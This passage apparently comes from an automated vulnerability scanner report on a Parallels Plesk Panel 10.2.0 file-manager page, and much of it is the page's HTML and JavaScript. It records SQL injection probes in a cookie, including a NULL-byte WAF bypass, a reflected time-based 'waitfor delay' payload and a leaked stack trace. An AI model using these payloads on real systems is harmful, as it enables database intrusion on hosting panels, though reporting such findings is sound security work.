               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/edit/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>

<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/ [certificateslist cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/view/

Issue detail

The certificateslist cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the certificateslist cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%00'; no_frames_login_page=deleted;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:32 GMT
Connection: close
Content-Length: 956

ERROR: PleskBadURIException
Invalid URI:

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI:

0: UIPointer.php:40
   UIPointer::parse(string '')
1: UiIntegration.php:213
   UiIntegration->_getRootUIPointers()
2: UiIntegration.php:300
   UiIntegration->isUriValid(object of type plesk__client__dashboard)
3: SMBConnector.php:110
   SMBConnector->renderPathbar(object of type Navigation, object of type plesk__client__domain__hosting__file_manager__view)
4: Abstract.php:288
   Form_Abstract->renderPathbarHistory(object of type Navigation, object of type plesk__client__domain__hosting__file_manager__view)
5: Form.php:144
   Form->assign()
6: class.FileManagerForm.php:694
   FileManagerForm->assignFileList(object of type FileList, boolean false)
7: FileManagerUIPointer.php:747
   FileManagerUIPointer->accessItem(string 'GET', NULL null)
8: UIPointer.php:600
   UIPointer->access(string 'GET')
9: plesk.php:47

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%00''; no_frames_login_page=deleted;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:36 GMT
Connection: close
Content-Length: 93446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%27%29waitfor%2520delay%270%253a0%253a20%27--%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
                errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
                        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/view/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" 